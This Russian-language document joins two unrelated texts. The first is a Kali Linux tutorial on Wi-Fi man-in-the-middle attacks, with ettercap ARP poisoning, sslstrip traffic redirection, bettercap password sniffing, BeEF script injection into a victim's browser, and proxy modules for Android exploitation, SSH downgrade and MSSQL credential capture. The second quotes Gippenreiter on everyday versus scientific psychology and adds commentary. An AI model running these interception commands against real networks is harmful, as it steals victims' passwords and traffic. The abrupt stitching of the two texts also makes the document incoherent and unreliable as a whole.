Предупреждение! Всё ниже описанное я не призываю исполнять и повторять, а лишь рассказываю и обучаю, чтобы вы могли знать как собран механизм взлома/обмана/и т.п.

В данной статье будем рассматривать случаи перехвата трафика в Wi-Fi сети.

MITM- человек посередине, посредник. Так называется совокупность методов перехвата трафика, где вы- посредник между роутером и жертвой. Ваш ПК будет служить в роли WiFi-точки тем самым через вас будет проходить весь накопленный трафик.

Я лично не буду рассказывать все методы и комбинации данного вида взлома, т.к. их достаточно много. Мы лично на данном примере разберём два способа. Первый сложный и изживший себя- комбинация ettercap+wireshark. Второй способ относительно новый и удобный. Bettercap- набор инструментов для проведения тестов на безопасность в сети. Так же рассмотрим случай комбинации bettercap+beef. А так же модули для bettercap'a.

I) Начнём с комбинации программ ettercap+wireshark.

root@571:~#ifconfig

root@571:~#echo "1">/proc/sys/net/ipv4/ip_forward

Далее запускаем программу ettercap.

>sniff>unified sniffing>(выбрать сетевую карту (wlan0))

>hosts>scan for hosts

>hosts>host list

>выделить роутер>add to target 1

>выбрать жертву>add to target 2

>MITM>arp poising>галочка напротив пункта "sniff remote connection"

>start>start sniffing

Далее запускаем программу wireshark.

>выбрать сетевую карту (wlan0)>start

root@571:~#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

root@571:~#sslstrip -l 8080

При этом случае в программе ettercap будет выводится вся нужная информация включая пароли жертвы.

Если вы желаете, чтобы вся информация полностью выходила в ваш браузер, можете сделать следующее:

root@571:~#webspy -i wlan0 192.168.1.7(<-вставляете IP-адрес жертвы)

И запускаем браузер.

II) Продолжим изучать методы с программой bettercap.

Bettercap- это более улучшенная версия ettercap, удобная и не хуже оригинала.

Скачать данную программу:

root@571:~#apt-get install bettercap

1)root@571:~#bettercap -X (сниффинг всей сети)

root@571:~#bettercap --proxy -P POST (активируется незащищённая сеть, сниффинг, спуфинг, в общем всё, что нам нужно)

root@571:~#bettercap --sniffer --spoof ARP --proxy-http --proxy-https --custom-parser "password"

...При данном методе будут выводится все данные, где задействованы пароли...

2)root@571:~#./beef (Далее копируем из терминала UI URL со второго абзаца в браузер)

root@571:~#bettercap -I wlan0 -T (Тут IP-жертвы) --proxy-module injectjs (Тут вставляем Hook URL со второго абзаца)

...При этом методе всё будет отображаться на вашем сервере beef открытом в браузере...

III) Так же можно рассмотреть модули для bettercap'a:

Скачать их можно таким образом:

root@571:~#git clone https://github.com/evilsocket/bettercap-proxy-modules.git

Свойства данных модулей:

1)http/androidpwn.rb – Выполнит пользовательскую команду на каждом устройстве Android, эксплуатируя уязвимость "addJavascriptInterface".

2)http/osxsparkle.rb – Выполнит пользовательский исполнимый файл Mach-O OSX на каждой OSX машине, эксплуатируя уязвимость Sparkle Updater https://vulnsec.com/2016/osx-apps-vulnerabilities/.

3)http/beefbox.rb – Похоже на inject*, но специализируется на работе с BeEF framework.

4)http/debug.rb - Отладка HTTP запросов и ответов.

5)http/simple_post.rb – Перехватывает и отображает только выбранные POST поля.

6)http/location_hijacking.rb – Перехватывает заголовок Location с пользовательским URL.

7)http/replace_images.rb – Замена всех изображений на пользовательское.

8)http/rickroll.rb – Вставка iframe с (не)знаменитым видео RickRoll в режиме автовоспроизведения.

9)http/hack_title.rb – Добавляет текст "HACKED" в заголовок веб-сайтов.

10)http/replace_file.rb – Заменяет на лету загружаемые файлы на пользовательские.

TCP прокси модули

11)tcp/debug.rb – Просто скидывает в двоичном формате весь TCP трафик, проходящий через прокси.

12)tcp/sshdowngrade.rb – Если возможно, выполняет атаку понижения SSH 2.x -> 1.x.

13)tcp/mssqlauth.rb - Понижает MSSQL шифрование и захватывает учётные данные входа.

Пример синтаксиса:

root@571:~#bettercap -X --proxy --proxy-module=/home/mial/bin/bettercap-proxy-modules/http/hack_title.rb

IV) И это ещё не все возможные комбинации и функции данной утилиты. Подробно можете почитать в самой программе набрав команду:

root@571:~#bettercap --help

Надеюсь вам понравилось. В дальнейшем буду продолжать опубликовывать статьи по дистрибутиву Kali Linux.

Связаться со мной можно в ВК: https://vk.com/hydra571.

Сегодня мы прочтём и обсудим классический текст Ю.Б. Гиппенрейтер о различиях между житейскими знаниями и психологией.

Цитируем по: Гиппенрейтер Ю.Б. Введение в общую психологию. М: Изд-во МГУ, 1988. С. 7-19.

«… и обычный человек располагает определенными психологическими знаниями. Об этом можно судить по тому, что каждый человек в какой-то мере может понять другого, повлиять на его поведение, предсказать его поступки, учесть его индивидуальные особенности, помочь ему и т. п. Давайте задумаемся над вопросом: чем же отличаются житейские психологические знания от научных?

Я назову вам пять таких отличий.

Первое: житейские психологические знания конкретны; они приурочены к конкретным ситуациям, конкретным людям, конкретным задачам. Говорят, официанты и водители такси - тоже хорошие психологи. Но в каком смысле, для решения каких задач? Как, мы знаем, часто - довольно прагматических. Также конкретные прагматические задачи решает ребенок, ведя себя одним образом с матерью, другим - с отцом, и снова совсем иначе - с бабушкой. В каждом конкретном случае он точно знает, как надо себя вести, чтобы добиться желаемой цели. Но вряд ли мы можем ожидать от него такой же проницательности в отношении чужих бабушки или мамы.

Итак, житейские психологические знания характеризуются конкретностью, ограниченностью задач, ситуаций и лиц, на которые они распространяются. Научная же психология, как и всякая наука, стремится к обобщениям. Для этого она использует научные понятия. Отработка понятий - одна из важнейших функций науки. В научных понятиях отражаются наиболее существенные свойства предметов и явлений, общие связи и соотношения.

Научные понятия четко определяются, соотносятся друг с другом, связываются в законы. Например, в физике благодаря введению понятия силы И. Ньютону удалось описать с помощью трех законов механики тысячи различных конкретных случаев движения и механического взаимодействия тел. То же происходит и в психологии. Можно очень долго описывать человека, перечисляя в житейских терминах его качества, черты характера, поступки, отношения с другими людьми. Научная же психология ищет и находит такие обобщающие понятия, которые не только экономизируют описания, но и за конгломератом частностей позволяют увидеть общие тенденции и закономерности развития личности и ее индивидуальные особенности. Нужно отметить одну особенность научных психологических понятий: они часто совпадают с житейскими по своей внешней форме, т. е. попросту говоря, выражаются теми же словами. Однако внутреннее содержание, значения этих слов, как правило, различны. Житейские термины обычно более расплывчаты и многозначны.

Однажды старшеклассников попросили письменно ответить на вопрос: что такое личность? Ответы оказались очень разными, а один учащийся ответил так: "Это то, что следует проверить по документам". Я не буду сейчас говорить о том, как понятие "личность" определяется в научной психологии, - это сложный вопрос, и мы им специально займемся позже, на одной из последних лекций. Скажу только, что определение это сильно расходится с тем, которое было предложено упомянутым школьником.

Второе отличие житейских психологических знаний состоит в том, что они носят интуитивный характер. Это связано с особым способом их получения: они приобретаются путем практических проб и прилаживаний. Подобный способ особенно отчетливо виден у детей. Я уже упоминала об их хорошей психологической интуиции. А как она достигается? Путем ежедневных и даже ежечасных испытаний, которым они подвергают взрослых и о которых последние не всегда догадываются. И вот в ходе этих испытаний дети обнаруживают, из кого можно "вить веревки", а из кого нельзя. Часто педагоги и тренеры находят эффективные способы воспитания, обучения, тренировки, идя тем же путем: экспериментируя и зорко подмечая малейшие положительные результаты, т. е. в определенном смысле "идя на ощупь". Нередко они обращаются к психологам с просьбой объяснить психологический смысл найденных ими приемов.

В отличие от этого научные психологические знания рациональны и вполне осознанны. Обычный путь состоит в выдвижении словесно формулируемых гипотез и проверке логически вытекающих из них следствий.

Третье отличие состоит в способах передачи знаний и даже в самой возможности их передачи. В сфере практической психологии такая возможность весьма ограничена. Это непосредственно вытекает из двух предыдущих особенностей житейского психологического опыта - его конкретного и интуитивного характера. Глубокий психолог Ф. М. Достоевский выразил свою интуицию в написанных им произведениях, мы их все прочли - стали мы после этого столь же проницательными психологами? Передается ли житейский опыт от старшего поколения к младшему? Как правило, с большим трудом и в очень незначительной степени. Вечная проблема "отцов и детей" состоит как раз в том, что дети не могут и даже не хотят перенимать опыт отцов. Каждому новому поколению, каждому молодому человеку приходится самому "набивать шишки" для приобретения этого опыта.

В то же время в науке знания аккумулируются и передаются с большим, если можно так выразиться, КПД. Кто-то давно сравнил представителей науки с пигмеями, которые стоят на плечах у великанов - выдающихся ученых прошлого. Они, может быть, гораздо меньше ростом, но видят дальше, чем великаны, потому что стоят на их плечах. Накопление и передача научных знаний возможна благодаря тому, что эти знания кристаллизуются в понятиях и законах. Они фиксируются в научной литературе и передаются с помощью вербальных средств, т. е. речи и языка…

Четвёртое различие состоит в методах получения знаний в сферах житейской и научной психологии. В житейской психологии мы вынуждены ограничиваться наблюдениями и размышлениями. В научной психологии к этим методам добавляется эксперимент. Суть экспериментального метода состоит в том, что исследователь не ждет стечения обстоятельств, в результате которого возникает интересующее его явление, а вызывает это явление сам, создавая соответствующие условия. Затем он целенаправленно варьирует эти условия, чтобы выявить закономерности, которым данное явление подчиняется. С введением в психологию экспериментального метода (открытия в конце прошлого века первой экспериментальной лаборатории) психология, как я уже говорила, оформилась в самостоятельную науку.

Наконец, пятое отличие, и вместе с тем преимущество, научной психологии состоит в том, что она располагает обширным, разнообразным и подчас уникальным фактическим материалом, недоступным во всем своем объеме ни одному носителю житейской психологии. Материал этот накапливается и осмысливается, в том числе в специальных отраслях психологической науки, таких, как возрастная психология, педагогическая психология, пато- и нейропсихология, психология труда и инженерная психология, социальная психология, зоопсихология и др. В этих областях, имея дело с различными стадиями и уровнями психического развития животных и человека, с дефектами и болезнями психики, с необычными условиями труда - условиями стресса, информационных перегрузок или, наоборот, монотонии и информационного голода и т.п., - психолог не только расширяет круг своих исследовательских задач, но и сталкивается с новыми неожиданными явлениями. Ведь рассмотрение работы какого-либо механизма в условиях развития, поломки или функциональной перегрузки с разных сторон высвечивает его структуру и организацию.»

Прежде всего давайте сориентируемся в культурно-исторической перспективе. Юлия Борисовна Гиппенрейтер окончила отделение психологии философского факультета МГУ в 1953 году. Ученица А.Н. Леонтьева, доктор психологических наук (1975), профессор кафедры общей психологии факультета психологии факультета психологии МГУ им. М.В. Ломоносова (1978). Это сейчас она профессор, признанный автор популярных книг, а в эпоху, когда Ю.Б. Гиппенрейтер выбирала профессию, признавать психологию самостоятельной наукой не спешили и перспективы психологической деятельности отнюдь не были радужными. Требовались преданность делу и вера в правильность сделанного выбора, чтобы продолжать заниматься психологией, наукой о людях, в годы, когда внутренний мир советского человека сверялся с моральным кодексом строителя коммунизма.

Отличие житейского знания от научного (обобщённость, рациональность, письменная форма передачи, экспериментальный способ получения данных, разделённость знания на отраслевые подразделы) создали психологию как науку.

https://www.artstation.com/artwork/e4byX